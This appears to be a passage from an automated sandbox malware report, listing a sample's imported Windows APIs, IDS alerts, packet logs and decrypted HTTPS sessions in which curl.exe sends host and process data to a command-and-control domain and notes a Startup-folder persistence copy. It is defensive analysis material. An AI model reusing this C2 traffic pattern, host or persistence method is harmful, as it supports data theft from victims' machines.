ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T16:46:14.864811+0100	2018886	ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND	1	192.168.2.5	49720	94.154.172.218	443	TCP
2024-12-12T16:46:34.577073+0100	2018886	ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND	1	192.168.2.5	49763	94.154.172.218	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 16:46:13.042033911 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:13.042109013 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:13.042289972 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:13.072992086 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:13.073046923 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:14.857752085 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:14.858910084 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:14.860596895 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:14.860606909 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:14.860961914 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:14.864289045 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:14.864367008 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:14.864542007 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:14.864548922 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:15.467987061 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:15.468147039 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:15.468256950 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:15.538610935 CET	49720	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:15.538644075 CET	443	49720	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:16.671097040 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:16.671148062 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:16.671212912 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:16.678082943 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:16.678102970 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:18.442889929 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:18.442953110 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:18.444988966 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:18.444996119 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:18.445307016 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:18.448945999 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:18.495338917 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:18.882273912 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:18.882359028 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:18.882421017 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:18.945658922 CET	49725	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:18.945688963 CET	443	49725	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:20.087704897 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:20.087769032 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:20.087846041 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:20.249775887 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:20.249803066 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.016448975 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.016545057 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.017864943 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.017874956 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.018151045 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.020883083 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.067332029 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.436158895 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.436261892 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.436319113 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.444262028 CET	49729	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.444277048 CET	443	49729	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.721173048 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.721235037 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:22.721316099 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.729218960 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:22.729239941 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:24.512527943 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:24.512612104 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:24.514045000 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:24.514059067 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:24.514307022 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:24.518237114 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:24.559340000 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:24.942243099 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:24.942332983 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:24.942900896 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:24.949433088 CET	49737	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:24.949471951 CET	443	49737	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:32.786081076 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:32.786143064 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:32.786259890 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:32.796171904 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:32.796221972 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:34.564544916 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:34.564661980 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:34.567735910 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:34.567749023 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:34.568020105 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:34.576581001 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:34.576641083 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:34.576854944 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:34.576863050 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:34.577037096 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:34.577042103 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:35.244925022 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:35.245029926 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:35.245107889 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:35.257425070 CET	49763	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:35.257446051 CET	443	49763	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:35.487878084 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:35.487926006 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:35.488179922 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:35.496072054 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:35.496094942 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:37.259031057 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:37.259155035 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:37.261069059 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:37.261090994 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:37.261363029 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:37.263915062 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:37.311328888 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:37.681941032 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:37.682035923 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:37.682140112 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:37.717919111 CET	49771	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:37.717935085 CET	443	49771	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:38.050894976 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:38.050950050 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:38.051348925 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:38.064066887 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:38.064081907 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:39.831716061 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:39.831902981 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:39.833419085 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:39.833451033 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:39.833714962 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:39.836577892 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:39.883328915 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:40.263060093 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:40.263139963 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:40.263294935 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:40.272480965 CET	49785	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:40.272516966 CET	443	49785	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:40.792059898 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:40.792105913 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:40.792195082 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:40.814229965 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:40.814308882 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:42.578455925 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:42.578583956 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:42.579860926 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:42.579885006 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:42.580146074 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:42.582655907 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:42.627335072 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:43.005196095 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:43.005280972 CET	443	49793	94.154.172.218	192.168.2.5
Dec 12, 2024 16:46:43.005414963 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:43.013545036 CET	49793	443	192.168.2.5	94.154.172.218
Dec 12, 2024 16:46:43.013607025 CET	443	49793	94.154.172.218	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 16:46:12.613166094 CET	54277	53	192.168.2.5	1.1.1.1
Dec 12, 2024 16:46:13.020836115 CET	53	54277	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 16:46:12.613166094 CET	192.168.2.5	1.1.1.1	0xe5aa	Standard query (0)	peerhost59mj7i6macla65r.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 16:46:13.020836115 CET	1.1.1.1	192.168.2.5	0xe5aa	No error (0)	peerhost59mj7i6macla65r.com		94.154.172.218	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865x-auth:

peerhost59mj7i6macla65r.com

433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865x-auth:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49720	94.154.172.218	443	2212	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:46:14 UTC	439	OUT	POST /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32 X-Sec-Id: 0 Content-Length: 17852 Content-Type: application/x-www-form-urlencoded
2024-12-12 15:46:14 UTC	15945	OUT	Data Raw: 0d 0a 48 6f 73 74 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4c 46 4f 4e 53 2d 50 43 0d 0a 4f 53 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 0d 0a 4f 53 20 56 65 72 73 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 30 2e 30 2e 31 39 30 34 35 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 35 0d 0a 4f 53 20 4d 61 6e 75 66 61 63 74 75 72 65 72 3a 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 0d 0a 4f 53 20 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 53 74 61 6e 64 61 6c 6f 6e 65 20 57 6f 72 6b 73 74 61 74 69 6f 6e 0d 0a 4f 53 20 42 75 69 Data Ascii: Host Name: user-PCOS Name: Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Bui
2024-12-12 15:46:14 UTC	1907	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 30 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 31 31 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 31 36 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 32 35 37 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 34 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 33 33 32 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 Data Ascii: 1 6'620 KIDtvgAxrbPQKZXDOYjLxNjQO. 3116 Console 1 6'616 KIDtvgAxrbPQKZXDOYjLxNjQO. 2576 Console 1 6'624 KIDtvgAxrbPQKZXDOYjLxNjQO. 3332 Console 1
2024-12-12 15:46:15 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:15 UTC	12	IN	Data Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49725	94.154.172.218	443	748	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:46:18 UTC	366	OUT	GET /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32 X-Sec-Id: 3
2024-12-12 15:46:18 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:18 UTC	45	IN	Data Raw: 32 32 0d 0a 5b 41 75 64 69 6f 5d 0a 44 65 66 61 75 6c 74 3d 39 30 30 0a 41 75 74 6f 3d 31 0a 46 6f 72 63 65 3d 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 22[Audio]Default=900Auto=1Force=00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49729	94.154.172.218	443	2780	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:46:22 UTC	353	OUT	GET /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
2024-12-12 15:46:22 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:22 UTC	12	IN	Data Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49737	94.154.172.218	443	6252	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:46:24 UTC	435	OUT	POST /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32 X-Sec-Id: 1 Content-Length: 0 Content-Type: application/x-www-form-urlencoded
2024-12-12 15:46:24 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:24 UTC	12	IN	Data Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49763	94.154.172.218	443	3836	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:46:34 UTC	547	OUT	POST /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32 X-Sec-Id: 0 Content-Length: 17774 Content-Type: application/x-www-form-urlencoded
2024-12-12 15:46:34 UTC	15837	OUT	Data Raw: 0d 0a 48 6f 73 74 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4c 46 4f 4e 53 2d 50 43 0d 0a 4f 53 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 0d 0a 4f 53 20 56 65 72 73 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 30 2e 30 2e 31 39 30 34 35 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 35 0d 0a 4f 53 20 4d 61 6e 75 66 61 63 74 75 72 65 72 3a 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 0d 0a 4f 53 20 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 53 74 61 6e 64 61 6c 6f 6e 65 20 57 6f 72 6b 73 74 61 74 69 6f 6e 0d 0a 4f 53 20 42 75 69 Data Ascii: Host Name: user-PCOS Name: Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Bui
2024-12-12 15:46:34 UTC	1937	OUT	Data Raw: 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 31 31 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 31 36 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 32 35 37 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 34 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 33 33 32 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 34 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 34 34 30 34 Data Ascii: XDOYjLxNjQO. 3116 Console 1 6'616 KIDtvgAxrbPQKZXDOYjLxNjQO. 2576 Console 1 6'624 KIDtvgAxrbPQKZXDOYjLxNjQO. 3332 Console 1 6'624 KIDtvgAxrbPQKZXDOYjLxNjQO. 4404
2024-12-12 15:46:35 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:35 UTC	12	IN	Data Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49771	94.154.172.218	443	3620	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:46:37 UTC	474	OUT	GET /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32 X-Sec-Id: 3
2024-12-12 15:46:37 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:37 UTC	45	IN	Data Raw: 32 32 0d 0a 5b 41 75 64 69 6f 5d 0a 44 65 66 61 75 6c 74 3d 39 30 30 0a 41 75 74 6f 3d 31 0a 46 6f 72 63 65 3d 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 22[Audio]Default=900Auto=1Force=00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49785	94.154.172.218	443	1716	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
